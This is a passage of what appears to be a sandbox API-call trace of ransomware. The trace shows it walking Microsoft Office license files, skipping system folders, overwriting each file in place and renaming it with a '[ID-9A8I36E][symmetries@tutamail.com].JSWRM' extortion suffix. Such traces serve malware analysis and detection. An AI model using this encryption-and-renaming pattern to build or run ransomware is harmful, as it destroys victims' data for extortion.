cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.483] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.483] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22092) returned 1 [0103.484] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.484] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5640) returned 0x24c1d0 [0103.484] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5640, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5640, lpOverlapped=0x0) returned 1 [0103.487] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.487] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5640, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5640, lpOverlapped=0x0) returned 1 [0103.487] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.487] CloseHandle (hObject=0x45c) returned 1 [0103.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0103.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0103.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0103.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0103.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0103.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0103.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.488] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0103.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0103.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.489] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3fdcd93, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3fdcd93, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4180773, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail2-ul-oob.xrm-ms", cAlternateFileName="HOBCC6~1.XRM")) returned 1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.489] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0103.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0103.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c010 [0103.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-oob.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0103.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.490] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11613) returned 1 [0103.490] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0103.490] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0103.493] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.493] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0103.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.493] CloseHandle (hObject=0x45c) returned 1 [0103.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0103.493] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.493] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.493] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0103.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0103.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0103.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0103.494] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f970 [0103.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0103.494] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.494] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.495] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3f4440f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3f4440f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe404f4c8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df6, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail2-ul-phn.xrm-ms", cAlternateFileName="HO504E~1.XRM")) returned 1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2=".") returned 1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="..") returned 1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="...") returned 1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="windows") returned -1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="perflogs") returned -1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0103.495] lstrcmpiW (lpString1="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpString2="msocache") returned -1 [0103.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0103.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0103.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d298, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0103.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0103.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0103.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail2-ul-phn.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c2d0 | out: hHeap=0x1e0000) returned 1 [0103.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.495] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.495] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0103.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.496] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19958) returned 1 [0103.496] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.496] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0103.496] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0103.499] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.499] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0103.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.500] CloseHandle (hObject=0x45c) returned 1 [0103.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0103.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0103.500] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0103.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0103.500] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0103.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0103.500] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.500] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0103.513] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe42fdf13, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe42fdf13, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe43967f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x29a3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeBusinessR_Retail3-pl.xrm-ms", cAlternateFileName="HO0179~1.XRM")) returned 1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2=".") returned 1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="..") returned 1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="...") returned 1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="windows") returned -1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="recovery") returned -1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.513] lstrcmpiW (lpString1="HomeBusinessR_Retail3-pl.xrm-ms", lpString2="msocache") returned -1 [0103.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0103.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241358, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeBusinessR_Retail3-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0103.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0103.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0103.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeBusinessR_Retail3-pl.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0103.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, 